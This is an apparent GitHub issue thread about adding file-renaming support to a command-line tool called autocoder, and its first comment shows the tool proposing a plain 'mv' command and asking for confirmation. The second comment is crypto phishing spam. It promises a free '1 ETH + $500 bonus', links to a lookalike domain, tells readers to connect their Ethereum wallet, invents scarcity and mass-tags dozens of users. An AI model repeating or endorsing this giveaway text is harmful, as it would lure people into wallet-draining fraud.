### ISSUE TITLE
Add support for renaming files

### ISSUE THREAD

**Issue by RafaelCosman** [RafaelCosman/autocoder#4]

**Comment by RafaelCosman** [comment]
This actually works now:

```
autocoder "please rename the webserver file to something else"
autocoder would like to run the following commands. Press enter to continue. (to cancel, press control-c)

mv webserver.py server.py
```

**Comment by pipelinevp** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
mZilioCodengage, @paulofdev, @ianrtracey, @Yossaphong, @kid551, @download8866, @akihikosato1970, @li-yuan, @sidizawi, @LAOZTK, @peterbriggs42, @razzl, @nivance, @xiaoyifang, @bigspider, @qxdo, @FFish, @sks444, @jaeminChung, @Eric-Jalal, @little-mr-jiang, @acathur, @nikhilnayak98, @glebmikulko, @chandlerroth, @michelabboud, @xianglo, @gabralia, @thebatman1, @chenyangguang, @khoallaby, @zaza6677, @riceke, @lethevinh, @rebelzion, @just-a-jazz, @terrytilley, @diguo2046, @b2397, @huahuayu, @oynix, @nrickz, @whitneymckinsey, @Zoezzz, @cybele02, @Prefee, @On-davo, @terasum, @Saummya, @aalenliang
